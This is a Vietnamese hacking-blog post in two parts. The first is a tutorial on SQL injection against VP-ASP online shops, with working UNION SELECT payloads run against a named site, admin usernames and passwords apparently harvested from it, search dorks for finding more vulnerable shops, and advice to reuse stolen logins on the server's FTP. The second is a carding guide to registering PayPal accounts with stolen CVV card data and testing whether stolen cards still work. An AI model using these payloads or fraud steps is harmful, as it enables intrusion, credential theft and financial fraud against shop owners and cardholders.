xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2 from tbluser”having 1=1–sp_password
nó vẫn báo như vậy
Microsoft JET Database Engine error ‘80040e14′ The number of columns in the two selected tables or queries of a union query do not match. /shop$db.asp, line 912
ta cứ tiếp tục như vậy
xxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3 from tbluser”having 1=1–sp_password
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4 from tbluser”having 1=1–sp_password
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4,5 from tbluser”having 1=1–sp_password
…………………..
xxxx.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser”having 1=1–sp_password
Cho đến khi có 1 cái bảng đẹp đẹp như sau ( ở đây là số 37 )
3
click to see more422

18Please review these other products:
—————————-Chú thích—————————–
Kinh nghiệm qua nhiều lần hack của tôi là bạn nên xem line để thêm số cho nhanh . Ví dụ như ở shop này line là 912 ——-> /shop$db.asp, line 912 , với line là 912 thường thì bạn phải thêm đến 37 . Còn một số nữa :
line 467 —–> thêm đến47
line 468 ——> thêm 47
line 469 ——-> thêm 48
còn lại bạn tự tìm hiểu nha.Nếu không nhớ line thì bạn cứ thử 1 trong các số thường gặp sau : 34 , 37 , 47 , 48 ,54 , 83 , 84 ,92 ……( Thông thường tôi chỉ thêm đến 84 là hết kiên nhẫn nổi ) nếu bạn kiên trì thì nên thêm từng số cho chắc ăn () . Tiếp nhé
————————————————————————-
Bây giờ chúng ta bắt đầu lấy user and pass:• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn• fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn ( fldusername và fldpassword là tên của 2 column trong tbluser ) ,Ở đây tôi lần lượt thay vào số 3 và số 4
Code
http://www.treasureshidden.com/shopping/sh….asp?cat=9′ union select 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37 from tbluser”having 1=1–sp_password
ok nó sẽ báo như vầy :
admin
click to see moreadmin32612 22

18Please review these other products:
——————————-
harvey
click to see moreboha216322

18Please review these other products:
ok shop này có 2 admin + admin pass : admin32612
+ harvey pass: boha2163
Trong trường hợp nó chỉ có thế này
3
click to see more

Please review these other products:
bạn chỉ có thể thay vào số 3 mà thôi vậy ta sẽ dùng câu lệnh như sau
union select 1,2, fldusername%2b’/’%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37 from tbluser”having 1=1–sp_password
cái này tôi không giải thích thêm , chắc bạn hiểu rồi > OK
http://www.treasureshidden.com/shopping/sh….asp?cat=9′
Việc còn lại là tìm link admin
ta cứ thử 2 link này xem
http://httpxxxx.treasureshidden.com/…/shopadmin.asp
http://xxxxx.treasureshidden.com/sho…shopadmin1.asp
Nếu link admin ko phải như vậy, thi bạn dùng câu lệnh sau :
union select 1,2,fieldvalue,,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from configuration”having 1=1–sp_password
fieldvalue và configuration là gì thì bạn hiểu rồi không nói nữa. Câu lệnh này sẽ cho ra rất nhiều kết quả
bạn cứ view hết từng trang (thường có 10 trang ) thu thập các link có đuôi .asp rồi thay vào thử xem có phải link admin ko
————-<%>————-<%>——————————————
shopdisplayproducts.asp?id=1′lỗi ok! chúng ta thường sài một câu truy vấn để lấy thông tin:
CODE%20union%20select%201%20from%20″table”%27
“union select 1 from “table”‘
theo kinh nghiệm tôi rút ra được một điều. đó là chúng ta có thễ dựa vào số linemà đoán số column
CODE
line191 — 56line184 — 47,43,53line188 — 53,56line191 — 48line185 — 86,43line202 — 84,91line208 — 48,57line64 — 53line211,187 — 43line59 — 70……..
sơ bộ vậy thôi…….( các pác cũng có thể xài tool wis and wed của dora để hack….nhưng mình thì kông sài tool để hack mời các bạn tiếp)
chúng ta phải thêm đúng số column thì mới lấy thông tin được……trong trường hợp chúng ta thêm số hoài mà không thấy cái bảng nào ra cả…..vậy phải làm sao đây…..
uh. vậy là nó đã fix!bó tay sao…….không
Cách 1:các bạn đang ở file shopdisplayproducts.aspbây giờ chuyển sang fileshoptellafriend.aspshopexd.asp…….ok!tiếp tụcvd:shoptellafriend.aspline cũa nó là: 184 –> sô 47tiếp tục hack
CODE
shoptellafriend.asp?id=1%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser %27

nó ra một cái bảncó số 3hehe!lấy user vào pass nào
CODE
shoptellafriend.asp?id=1%20union%20select%201,2,fl dusername%2b’/’% 2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20t bluser%27
song xuôi, lấy link login nào.
CODEshoptellafriend.asp?id=1%20union%20select%201, 2,fi eldname%2b’/’% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,2
8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47%20from%20configuration%27
oach! sao chả thấy gì hết vậy……….hixhix….khó rồi đây……..bó tay sao.
bầy giờ chúng ta so sánh nhé.nếu ở file shopdisplayproducts.asp thì nó sẽ đưa ra kết quả cho chúng ta…ở ngay hàng đâu tiên thì bị bỏ trống.và thông tin xuất hiện ở hàng thứ 2vậy cái mà chúng ta vừa lấy được là cái hàng đầu tiên (hơi khó hiểu phải không)vậy chúng ta chỉ cần đưa cái link login về hàng 1 bằng cách thay số 1 bằng
CODEfieldname=’xadminpage’
——>shoptellafriend.asp?id=1 union select fieldname=’xadminpage’,2,fieldname%2b’/’% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47 from configuration’
ở file shopexd.asp cũng như vậy….
———————-<%>—————<%>———————–
Một số kinh nghiệm về hack shop :
_ Khi lấy được user/pass của điều hành cần dùng nó để đăng nhập server với giao thức ftp nếu “may mắn” (<—-lão hackerjp nói thế ()) bạn có thể làm chủ server và không cần phải phí công nhiều trong khi hack.
_ Có một số trường hợp, site bị lỗi Injectjon nhưng hiện trang báo lỗi (khi ta thêm dấu ‘): The page cannot bedisplayed, bạn cần chú ý phía bên dưới nó vẫn báo lỗi đấy._ Khi hack shop bạn nên xoay nó theo nhiều chiều : thay id bằng cat , để nguyên dấu ‘ hoặc xoá nó đi khi ta query………
_Khi search shop bạn cần cố gắng tìm cách search sao cho thật hiệu quả , một số từ khoá khác mà bạn cũng nên thử : VP ASP shopping
shop products
intext:”vp-asp shopping” inurl :”.asp?id=”
intext:”products” inurl:”.asp?id=”
và còn nhiều nữa bạn tự tìm hiểu thêm.
_ Tut này chỉ giúp bạn hack được những shop 1 pass ( tuy là 1 pass nhưng còn hàng triệu shop như vậy ) (cố gắng mà search)
_ Với những shop 2 pass , thực sự nếu bạn hiểu rõ những gì tôi nói ở trên , thì việc hack pass 2 ko khó…chúc may mắn ()
Hack vui vẻ nha.

Reg Paypal

Có thể nhiều anh em vẫn chưa hiểu rõ lắm Paypal là gì,nhưng kệ nói cụ thể ra Paypal là một dạng tài khoản bank online cho phép anh em có thể sử dụng để trao đổi mua bán hàng qua mạng như mua hosting,mua vật dụng gia đình hay nói thẳng ra là mua luôn cái Laptop về post bài cho anh em hehehe … đùa tý thôi. Bài này do tớ tự viết tút ko ăn cắp thêm bài của ai cả,đảm bảo hàng ko đụng,viết đơn giản mà dể hiểu mong anh em cổ vũ thêm để post thêm nhiều bài hướng dẫn khác .thanks for see it .

Yêu cầu : Một hòm mail bất kì,ít nhất một con CVV chưa add Paypal lần nào,và còn sử dụng được (đại loại là good CVV ) ,thường ở các bài hướng dẫn khác,họ đòi phải fake IP nhưng mà mình đã thử nhiều lần rồi,tự thấy chả cần,chỉ khi nào bạn chuẩn bị pay thì lúc đó mới phải fake IP,còn đâu cứ để IP trần đỡ mất thời gian check sock hay là proxy,và vào mạng lại nhanh nữa giải quyết thêm được bao nhiêu việc chứ ít đâu hehe …
Đăng kí hòm mail : lấy tên bất kì,có đuôi .vn cũng chả sao,user name bất kì chả liên quan đến thằng chủ thẻ cũng chả mất gì của bọ.Riêng chú ý một chút khi điền first name và last name thì nên lấy tên thằng chủ thẻ thì nó khó bị die Paypal hơn (còn lấy tên của mình cũng chẳng phải là dễ bị die,nhưng cẩn thận vẫn là trên hết ),nếu nó đòi điền address thì cũng điền luôn của thằng chủ thẻ.

Đăng kí Paypal :
bạn vào site hxxp://www.paypal.com vào phần signup bước này cũng là bước quan trọng này . bạn chọn ” Personal Account ” .Ở mục ” Select the country or region where you live ” bạn chú ý một chút,vì cái này liên quan đến cái thẻ của bạn thuộc nước nào ,bởi vì PP ko chỉ cho add một thẻ mà cho add rất nhiều thẻ,nhưng phải cùng một quốc gia với user đăng kí vì vậy nếu bạn có CVV của UK thì bạn đăng kí country là UK ,nếu của US thì đăng kí country là US … nói chung là có thẻ của quốc gia nào thì đăng kí country ở quốc gia đó,nhưng tớ thấy nhiều nhất vẫn là country US và ở bài viết này tớ chọn là US. click ” continue “
phần này cũng quan trọng bởi nó sẽ là một bước định đoạt con PP của bạn sẽ sống lâu hay chết yểu vì vậy hãy chú ý một chút bài post này của tớ là ok.
first và last name : điền theo tên ở trên mail của bạn,add cũng theo như mail thì tốt hơn,city,state,zipcode phải đi kèm với nhau bởi nếu không sẽ không qua được bước tiếp theo,số điện thoại bất kì ở bang nào của Mỹ cũng được,thương có định dạng như sau 270-xxx-6xxx.
phần email điền địa chỉ email của bạn ở trên,điền đụng địa chỉ email,vì đăng kí xong PP sẽ gửi link active hoặc active number cho bạn,pass word thì phải đủ 8 kí tự trở lên,phần câu hỏi và trả lời như kiểu sicurity thì các bạn nên chọn phần mother name,và city of birth là dể nhất,nhanh gọn.
tích vào 2 ô ở dưới,tớ tiếng Anh kém nên cũng không rõ nó là cái gì,đại loại là tôi đồng ý với những lời khai ở trên thì phải hehe… phần còn lại điền number bảo mật ở trong ô là ok.
khi đã login vào trong rồi các bạn có thể dễ dàng thấy mục ” Confirm email ” click vào đó, thấy dòng chữ ” note : Click here if a link does not appear in the email.”(tạm dịch : click here nếu như dòng link active của email ko làm việc được ) click vào đó rồi mở mail lấy số confirm number có dạng như sau ” 1368-xxxx-0761-xxxx-1548 ” rồi click vào confirm .ok paypal của bạn đã được active .ấn vào skip để tiếp tục ( thực ra nhấn skip để mình chuyển qua bước tiếp theo cho nhanh để add CC,còn nếu bạn có bank online thì có thể active được từ bước này…nhưng bài này tớ viết về add CVV,bài add bank online sẽ viết tút cho newbie sau )

Add Credit Card : bước này là bước cuối cùng và cũng là một cách cho các bạn check CC die hay là live .
click vào add credit card : vì tớ chưa biết con CVV của tớ đã được add hay chưa,và nó đã die hay chưa nên trong mục này các cậu ko cần quan tâm đến địa chỉ của thằng chủ thẻ vội,tên của thằng chủ thẻ thì bỏ qua luôn vì khi cái CVV của thằng chủ thẻ có tên trùng với con PP của cậu die rồi thì cậu phải add CVV khác,và điều quan trọng duy nhất là con CVV phải live,còn info có thể bị sai lệch một chút sẽ có bước tiếp theo .
ở bước này các cậu chỉ cần gõ vào đó card number,exdate,Card Verification Number …

+) nếu như nó báo thế này : We were unable to verify the billing address for this credit card. Please enter the address where you receive billing statements for this credit card below. Please refer to the automatic email we have sent to assist you. —> Quá là ok rồi,con CVV này good rồi,bước tiếp theo chỉ việc thay billing address thôi,tick vào phần ” Enter a new address as billing address ” rồi gõ đúng địa chỉ của thằng chủ thẻ là ok bạn đã có một con PP để đi ship hàng .,sau khi add xong nó sẽ hiện lên dòng này ở trên đầu ” You have successfully added a credit card. Please note that this credit card is now your primary card. For more information on your primary card, please refer to your Profile.”

+) nếu nó báo như thế này thì card có vấn đề : Before you can add this credit card to another account, you must contact the PayPal Credit Card Team at cardproblems@paypal.com. A customer service representative will respond to your request shortly. If you would rather add a different credit card to your PayPal account, you may do so at any time. Thank you for your cooperation. Lúc này thì bỏ qua con này đi,chả mua sắm được gì bằng con này đâu.
hoặc nó báo : This credit card has been denied by the bank that issued your credit card. For details on why your card was denied, please contact your credit card issuer’s customer service department. Or, you may want to try adding a different credit card
thì con này đã tử trận ,thằng chủ thẻ nó đã phong tỏa cái thẻ rùi .

+) nếu nó báo thế này : That credit card number is already assigned to another PayPal account. For security purposes, each credit card may only be assigned to one PayPal account. Please use a different card. tức là con PP này được add vào tài khoản khác rồi,nhưng vẫn sống,tức là mình vẫn có thể dùng CVV để mua đồ ở các shop cho mua bằng CVV rồi.

Trên đây là những hướng dẫn sơ đẳng cho newbie biết cách add CC vào paypal.

*) Chú ý : như lúc trước tớ nói,nếu như khi add CVV,nó vẫn báo : We were unable to verify the billing address for this credit card … mà khi bạn điền billing vào thì bị sai info của giữa zipcode và city với state thì sao nhỉ ?chẳng lẽ lại vứt ? không nên phí hoài,các cậu lúc này nên giữ nguyên cái Address,và dùng thêm tools CC2bank để bịa zipcode, khi đã có một zipcode thật và có city,state của zipcode đó thì các cậu có thể thay vào làm info của thẻ cũng được. Có thể các bạn hay nghi ngờ nhưng tớ cũng thường xuyên gặp phải trường hợp này và đã thử nhiều lần rồi,đều 100% add được CVV vào PP,nhưng nếu dùng con CVV để ship hàng thì chắc chắn là không được,con này khuyên các cậu nên mua netphone mà sài,như skype,globe7 … đảm bảo mua được 100%

• 
• 

Các bài viết khác:

Credit Card

Ship ở yessasian.com

Soft Hack IPhone

Linux Hacking

VClip Hacking

Chuyên Mục Network

Chuyên Mục Hacking

Thủ thuật hack IIS

Windows Hacking

Soft Hacking

Cơ Bản Ipc$

PAVietNam bị Hacker lợi dụng ra sao?

VClip - Hack Nick Yahoo In 10 Mininutes

Giới thiệu về md5(REA)

VClip C.E.H - Module 11: RPC GUI HACK

Tags: attacking, card, cc, credit card, Credit Cards, ddos, hacker, hacking, keylogger, trojan, victim, virus

Tác giả bài viết:

Mr. Gon - đã đăng 2391 bài trên VNIT™ - VNITWEB.

VNIT™ - Công nghệ thông tin và giải trí tổng hợp - Share For You, Free For All

Email Tác Giả | VNIT's RSS
url:http://vnitweb.com/?p=228